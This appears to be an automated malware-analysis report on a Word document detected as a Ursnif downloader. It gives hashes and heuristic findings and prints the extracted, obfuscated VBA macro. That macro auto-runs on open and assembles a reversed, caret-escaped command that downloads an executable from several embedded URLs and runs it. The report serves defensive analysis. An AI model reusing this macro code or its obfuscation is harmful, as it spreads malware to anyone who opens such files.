Office (OLE) malware analysis — malicious · 1ce1209b507ae76b

MALICIOUS

Office (OLE)

70.2 KB Created: 2018-09-05 21:11:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: 2b493e60af112d2d9983685b81bdb477 SHA-1: 6c869bddce4b720c0a7e43535a3bffca0fe56d88 SHA-256: 1ce1209b507ae76b3f83ff6d382024f08b38ff7c4572baee00575c8fbed5cebc

182 Risk Score

Heuristics 5

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5715 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5715 bytes
SHA-256: `359df57a0afc6916a5ff468324cafe3d0016b783762c14f4f2b4f8d67e62ff01`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "juKdplMZIzhiw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next Hour "167849998" + "iqzsr" Hour "304829387" + "qHLNqVjhzXCAd" + "l" + "zC" Hour "OLPh" + "tGDTLw" VBA.Shell CleanString(lIR) + KFiUzjF + MAKSWPcVW + hmiUoMzji + FrujmjatSTf + KcRqmOwqf + Pkpri + jHXBSuBoKpZZO + WOtLibCitDI, 38 - 38 Hour "3354" + "CFiQI" Hour "wJBaqzZnq" + "415455341" + "ScomrG" + "Ku" Hour "2063" + "121890588" + "3712" + "wKQmisWD" Hour "7831" + "bvdqsNbKAPd" End Sub Attribute VB_Name = "bMPkGzo" Function hmiUoMzji() On _ Error _ Resume _ Next Hour "2341" + "LzH" + "CCpR" + "IpSEv" Hour "Xv" + "pzE" + "Pof" + "ffHpCrqPNUZz" ihQiFMwfq = "cmd" + " " + "/" + "V^:^" + "O" + "/C" + Chr(0 + 3 + 3 + 0 + 28) + "^s" + "e^t ^d" + "^Y56= ^" + " " + " ^ ^" Hour "274929317" + "9582" Hour "9538" + "53923137" + "308026666" + "307043729" sdauGCCJ = " ^ " + " " + " ^ " + "^}" + "^}^{h" + "c^t" + "ac};k^a" + "er^b;l" Hour "320716294" + "10486307" + "Owz" + "mvI" Hour "122149262" + "334940253" Hour "IaIcQUNOP" + "96921372" + "aqLLuC" + "JCPUivkl" Hour "AufthmVObF" + "vPMlEHTmd" UZORPsGtKFY = "Fl$ me" + "t^" + "I^-^e" + "k^ovn^" + "I" + ";)lF^" + "l$" + " ,^" + "o^AO$" + "(e^l^i" + "^F^da" Hour "AaGl" + "pVHkUktF" Hour "l" + "YvHo" + "222667853" + "VPHzK" Hour "ZYCn" + "h" + "lGaLiiYqk" + "UQPG" iGtiCqSaw = "^o" + "^ln^w^" + "oD.p^pr" + "$" + "{^y" + "rt^{)" + "H" + "kr$^" + " n^i^ o" + "AO$(^hc" + "^a^ero" + "^f" + ";^'ex^e" Hour "nQGo" + "K" Hour "mnwoEwXfN" + "FujAIRTu" Hour "q" + "ukwZoHq" + "242763421" + "TR" oYCcPuum = "^.^'^+" + "dn^" + "B$^+^'" + "\^'" + "^+ci" + "l^bu" + "^p:vn" + "^e$^" + "=^l" + "^Fl" + "^$;'4^3" + "6" + "^'^" hmiUoMzji = ihQiFMwfq + sdauGCCJ + UZORPsGtKFY + iGtiCqSaw + oYCcPuum Hour "6135" + "LMDUwbzJFt" + "195149412" + "3395" Hour "GiTsM" + "S" + "LVRiCsn" + "YlZu" End Function Function FrujmjatSTf() On _ Error _ Resume _ Next Hour "455787440" + "112521891" + "900" + "asTIUXVH" Hour "TZWp" + "Hn" IbhzducSjrD = " = ^" + "dnB$^;)" + "^'@^" + "'(" + "^t^i^l" + "p" + "^S.'YV9" Hour "353270049" + "189291364" Hour "4786" + "ZSDnBkUTT" Hour "6502" + "351561333" + "1325" + "317133549" qiElmYPww = "^pP" + "Z^D^J^D" + "^b/^moc" + ".^ht" + "la^eh" + "^or" + "^pofn" + "i//:p" + "t^t^h^@" + "^" Hour "sz" + "wzQpOhliSRJwd" + "phckfTA" + "52619659" jibDUcwGTn = "1de3^4" + "T" + "^" + "eOn^i" + "/" + "/^l^p." + "w^w^tf" Hour "knQZ" + "38337714" + "RSzZPpGHj" + "NnkkW" Hour "rhd" + "fTNfstQuFbR" + "k" + "29" AdYLsj = "^arc//^" + ":ptth^@" + "^" + "ap" + "^8" + "^Km^W^" + "oqn" Hour "1255" + "ZOw" + "1652" + "avI" Hour "w" + "70226976" + "zjXfM" + "446925218" Hour "QULiwviwK" + "wktWvqN" Hour "NkLvzcZEPGfjQ" + "146610539" Hour "4618" + "510542551" bpaSaC = "/m^oc^." + "^t^en^a" + "l^pair^" + "e" + "b" FrujmjatSTf = IbhzducSjrD + qiElmYPww + jibDUcwGTn + AdYLsj + bpaSaC Hour "AsMUIVFQkowl" + "wBzBn" + "uuWl" + "VVMK" Hour "oQRU" + "mObN" + "m" + "wiH" Hour "2445" + "b" Hour "31859079" + "WDhlkB" + "P" + "Z" End Function Function KcRqmOwqf() On _ Error _ Resume _ Next Hour "K" + "wp" Hour "IupQRuEjMzz" + "kPzihUjAIaw" ODRIclvqn = "^i^s//^" + ":pt^t" + "^" + "h@^pV2" + "v^" + "D^d^x" + "^g/moc" + "^.^l" + "^ai" Hour "PQAWX" + "32036101" + "WQjaOdbbX" + "OwmjwfizqJH" Hour "129" + "37934661" Hour "r" + "7189" + "F" + "4997" HUCmd = "rot^i^" + "d" + "eonoci/" + "/" + "^:pt^" + "th^" Hour "itL" + "JICSk" Hour "wzMKWJ" + "299367834" + "bzi" + "425724729" Hour "5954" + "f" + "85895799" + "rtJo" YJKvFWmihfV = "@Q^8" + "^3ktHF/" + "^" + "edar^g" + "^pu" Hour "hwiQbnfZDZcUZZ" + "sc" Hour "GGZlB" + "QZNDiPV" + "Ykv" + "wwKCk" wYXRqoHrWWk = "/t" + "n^e^t" + "noc" + "^-^pw/m" + " ... (truncated)

SHA-256: 359df57a0afc6916a5ff468324cafe3d0016b783762c14f4f2b4f8d67e62ff01

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "juKdplMZIzhiw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Hour "167849998" + "iqzsr"
   Hour "304829387" + "qHLNqVjhzXCAd" + "l" + "zC"
   Hour "OLPh" + "tGDTLw"
VBA.Shell CleanString(lIR) + KFiUzjF + MAKSWPcVW + hmiUoMzji + FrujmjatSTf + KcRqmOwqf + Pkpri + jHXBSuBoKpZZO + WOtLibCitDI, 38 - 38
   Hour "3354" + "CFiQI"
   Hour "wJBaqzZnq" + "415455341" + "ScomrG" + "Ku"
   Hour "2063" + "121890588" + "3712" + "wKQmisWD"
   Hour "7831" + "bvdqsNbKAPd"
End Sub



Attribute VB_Name = "bMPkGzo"
Function hmiUoMzji()

On _
Error _
Resume _
Next
Hour "2341" + "LzH" + "CCpR" + "IpSEv"
   Hour "Xv" + "pzE" + "Pof" + "ffHpCrqPNUZz"
ihQiFMwfq = "cmd" + " " + "/" + "V^:^" + "O" + "/C" + Chr(0 + 3 + 3 + 0 + 28) + "^s" + "e^t ^d" + "^Y56= ^" + " " + " ^  ^"
Hour "274929317" + "9582"
   Hour "9538" + "53923137" + "308026666" + "307043729"
sdauGCCJ = " ^ " + "     " + "   ^  " + "^}" + "^}^{h" + "c^t" + "ac};k^a" + "er^b;l"
Hour "320716294" + "10486307" + "Owz" + "mvI"
   Hour "122149262" + "334940253"
   Hour "IaIcQUNOP" + "96921372" + "aqLLuC" + "JCPUivkl"
   Hour "AufthmVObF" + "vPMlEHTmd"
UZORPsGtKFY = "Fl$ me" + "t^" + "I^-^e" + "k^ovn^" + "I" + ";)lF^" + "l$" + " ,^" + "o^AO$" + "(e^l^i" + "^F^da"
Hour "AaGl" + "pVHkUktF"
   Hour "l" + "YvHo" + "222667853" + "VPHzK"
   Hour "ZYCn" + "h" + "lGaLiiYqk" + "UQPG"
iGtiCqSaw = "^o" + "^ln^w^" + "oD.p^pr" + "$" + "{^y" + "rt^{)" + "H" + "kr$^" + " n^i^ o" + "AO$(^hc" + "^a^ero" + "^f" + ";^'ex^e"
Hour "nQGo" + "K"
   Hour "mnwoEwXfN" + "FujAIRTu"
   Hour "q" + "ukwZoHq" + "242763421" + "TR"
oYCcPuum = "^.^'^+" + "dn^" + "B$^+^'" + "\^'" + "^+ci" + "l^bu" + "^p:vn" + "^e$^" + "=^l" + "^Fl" + "^$;'4^3" + "6" + "^'^"
hmiUoMzji = ihQiFMwfq + sdauGCCJ + UZORPsGtKFY + iGtiCqSaw + oYCcPuum
   Hour "6135" + "LMDUwbzJFt" + "195149412" + "3395"
   Hour "GiTsM" + "S" + "LVRiCsn" + "YlZu"
End Function
Function FrujmjatSTf()

On _
Error _
Resume _
Next
Hour "455787440" + "112521891" + "900" + "asTIUXVH"
   Hour "TZWp" + "Hn"
IbhzducSjrD = " = ^" + "dnB$^;)" + "^'@^" + "'(" + "^t^i^l" + "p" + "^S.'YV9"
Hour "353270049" + "189291364"
   Hour "4786" + "ZSDnBkUTT"
   Hour "6502" + "351561333" + "1325" + "317133549"
qiElmYPww = "^pP" + "Z^D^J^D" + "^b/^moc" + ".^ht" + "la^eh" + "^or" + "^pofn" + "i//:p" + "t^t^h^@" + "^"
Hour "sz" + "wzQpOhliSRJwd" + "phckfTA" + "52619659"
jibDUcwGTn = "1de3^4" + "T" + "^" + "eOn^i" + "/" + "/^l^p." + "w^w^tf"
Hour "knQZ" + "38337714" + "RSzZPpGHj" + "NnkkW"
   Hour "rhd" + "fTNfstQuFbR" + "k" + "29"
AdYLsj = "^arc//^" + ":ptth^@" + "^" + "ap" + "^8" + "^Km^W^" + "oqn"
Hour "1255" + "ZOw" + "1652" + "avI"
   Hour "w" + "70226976" + "zjXfM" + "446925218"
   Hour "QULiwviwK" + "wktWvqN"
   Hour "NkLvzcZEPGfjQ" + "146610539"
   Hour "4618" + "510542551"
bpaSaC = "/m^oc^." + "^t^en^a" + "l^pair^" + "e" + "b"
FrujmjatSTf = IbhzducSjrD + qiElmYPww + jibDUcwGTn + AdYLsj + bpaSaC
   Hour "AsMUIVFQkowl" + "wBzBn" + "uuWl" + "VVMK"
   Hour "oQRU" + "mObN" + "m" + "wiH"
   Hour "2445" + "b"
   Hour "31859079" + "WDhlkB" + "P" + "Z"
End Function
Function KcRqmOwqf()

On _
Error _
Resume _
Next
Hour "K" + "wp"
   Hour "IupQRuEjMzz" + "kPzihUjAIaw"
ODRIclvqn = "^i^s//^" + ":pt^t" + "^" + "h@^pV2" + "v^" + "D^d^x" + "^g/moc" + "^.^l" + "^ai"
Hour "PQAWX" + "32036101" + "WQjaOdbbX" + "OwmjwfizqJH"
   Hour "129" + "37934661"
   Hour "r" + "7189" + "F" + "4997"
HUCmd = "rot^i^" + "d" + "eonoci/" + "/" + "^:pt^" + "th^"
Hour "itL" + "JICSk"
   Hour "wzMKWJ" + "299367834" + "bzi" + "425724729"
   Hour "5954" + "f" + "85895799" + "rtJo"
YJKvFWmihfV = "@Q^8" + "^3ktHF/" + "^" + "edar^g" + "^pu"
Hour "hwiQbnfZDZcUZZ" + "sc"
   Hour "GGZlB" + "QZNDiPV" + "Ykv" + "wwKCk"
wYXRqoHrWWk = "/t" + "n^e^t" + "noc" + "^-^pw/m" + "
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.